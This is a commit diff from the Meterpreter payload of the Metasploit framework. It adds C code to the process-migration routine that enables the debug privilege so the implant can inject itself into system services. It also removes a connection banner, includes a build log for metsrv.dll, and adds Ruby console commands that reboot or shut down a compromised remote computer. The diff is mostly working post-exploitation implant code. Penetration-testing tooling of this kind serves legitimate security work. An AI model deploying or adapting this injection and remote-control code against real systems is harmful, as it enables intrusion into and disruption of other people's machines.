migration now enables the debug privilege first so it can migrate to system services, added reboot/shutdown wrappers
git-svn-id: file:///home/svn/incoming/trunk@2834 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7eb2c68d58
commit
9842cdc33b
Binary file not shown.
Binary file not shown.
|
@ -607,6 +607,8 @@ typedef struct _MigrationStubContext
|
|||
DWORD remote_request_core_migrate(Remote *remote, Packet *packet)
|
||||
{
|
||||
MigrationStubContext context;
|
||||
TOKEN_PRIVILEGES privs;
|
||||
HANDLE token = NULL;
|
||||
Packet *response = packet_create_response(packet);
|
||||
HANDLE process = NULL;
|
||||
HANDLE thread = NULL;
|
||||
|
@ -648,10 +650,30 @@ DWORD remote_request_core_migrate(Remote *remote, Packet *packet)
|
|||
// Get the process identifier to inject into
|
||||
pid = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);
|
||||
|
||||
// Try to enable the debug privilege so that we can migrate into system
|
||||
// services if we're administrator.
|
||||
if (OpenProcessToken(
|
||||
GetCurrentProcess(),
|
||||
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
|
||||
&token))
|
||||
{
|
||||
privs.PrivilegeCount = 1;
|
||||
privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
LookupPrivilegeValue(NULL, SE_DEBUG_NAME,
|
||||
&privs.Privileges[0].Luid);
|
||||
|
||||
AdjustTokenPrivileges(token, FALSE, &privs, 0, NULL, NULL);
|
||||
|
||||
CloseHandle(token);
|
||||
}
|
||||
|
||||
do
|
||||
{
|
||||
// Open the process so that we can duplicate shit into it
|
||||
if (!(process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)))
|
||||
if (!(process = OpenProcess(
|
||||
PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION |
|
||||
PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, pid)))
|
||||
{
|
||||
result = GetLastError();
|
||||
break;
|
||||
|
|
|
@ -25,13 +25,6 @@ DWORD __declspec(dllexport) Init(SOCKET fd)
|
|||
break;
|
||||
}
|
||||
|
||||
// Send banner string
|
||||
send_core_console_write(remote,
|
||||
"[ -= connected to =- ]\n"
|
||||
"[ -= meterpreter server =- ]\n"
|
||||
"[ -= v. %.8x =- ]\n",
|
||||
METSRV_VERSION_NUMBER);
|
||||
|
||||
// Register extension dispatch routines
|
||||
register_dispatch_routines();
|
||||
|
||||
|
|
|
@ -6,6 +6,45 @@
|
|||
--------------------Configuration: metsrv - Win32 Release--------------------
|
||||
</h3>
|
||||
<h3>Command Lines</h3>
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP105.tmp" with contents
|
||||
[
|
||||
/nologo /ML /W3 /GX /Zi /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "METSRV_EXPORTS" /Fp"Release/metsrv.pch" /Yu"metsrv.h" /Fo"Release/" /Fd"Release/" /FD /c
|
||||
"Z:\external\source\meterpreter\source\server\libloader.c"
|
||||
"Z:\external\source\meterpreter\source\server\remote_dispatch.c"
|
||||
]
|
||||
Creating command line "cl.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP105.tmp"
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP106.tmp" with contents
|
||||
[
|
||||
/nologo /ML /W3 /GX /Zi /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "METSRV_EXPORTS" /Fp"Release/metsrv.pch" /Yc"metsrv.h" /Fo"Release/" /Fd"Release/" /FD /c
|
||||
"Z:\external\source\meterpreter\source\server\metsrv.c"
|
||||
]
|
||||
Creating command line "cl.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP106.tmp"
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP107.tmp" with contents
|
||||
[
|
||||
common.lib ws2_32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /pdb:none /map:"Release/metsrv.map" /machine:I386 /def:"..\..\source\server\metsrv.def" /out:"Release/metsrv.dll" /implib:"Release/metsrv.lib" /libpath:"..\common\Release"
|
||||
.\Release\libloader.obj
|
||||
.\Release\metsrv.obj
|
||||
.\Release\remote_dispatch.obj
|
||||
\external\source\meterpreter\workspace\common\Release\common.lib
|
||||
]
|
||||
Creating command line "link.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP107.tmp"
|
||||
<h3>Output Window</h3>
|
||||
Compiling...
|
||||
metsrv.c
|
||||
Compiling...
|
||||
libloader.c
|
||||
remote_dispatch.c
|
||||
Generating Code...
|
||||
Linking...
|
||||
Creating library Release/metsrv.lib and object Release/metsrv.exp
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP10B.bat" with contents
|
||||
[
|
||||
@echo off
|
||||
copy release\metsrv.dll ..\..\output\server
|
||||
]
|
||||
Creating command line "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP10B.bat"
|
||||
|
||||
1 file(s) copied.
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -34,12 +34,14 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
#
|
||||
def commands
|
||||
{
|
||||
"execute" => "Execute a command",
|
||||
"getpid" => "Get the current process identifier",
|
||||
"getuid" => "Get the user that the server is running as",
|
||||
"kill" => "Terminate a process",
|
||||
"ps" => "List running processes",
|
||||
"sysinfo" => "Gets information about the remote system, such as OS",
|
||||
"execute" => "Execute a command",
|
||||
"getpid" => "Get the current process identifier",
|
||||
"getuid" => "Get the user that the server is running as",
|
||||
"kill" => "Terminate a process",
|
||||
"ps" => "List running processes",
|
||||
"reboot" => "Reboots the remote computer",
|
||||
"sysinfo" => "Gets information about the remote system, such as OS",
|
||||
"shutdown" => "Shuts down the remote computer",
|
||||
}
|
||||
end
|
||||
|
||||
|
@ -175,6 +177,15 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# Reboots the remote computer.
|
||||
#
|
||||
def cmd_reboot(*args)
|
||||
print_line("Rebooting...")
|
||||
|
||||
client.sys.power.reboot
|
||||
end
|
||||
|
||||
#
|
||||
# Displays information about the remote system.
|
||||
#
|
||||
|
@ -187,6 +198,15 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# Shuts down the remote computer.
|
||||
#
|
||||
def cmd_shutdown(*args)
|
||||
print_line("Shutting down...")
|
||||
|
||||
client.sys.power.shutdown
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue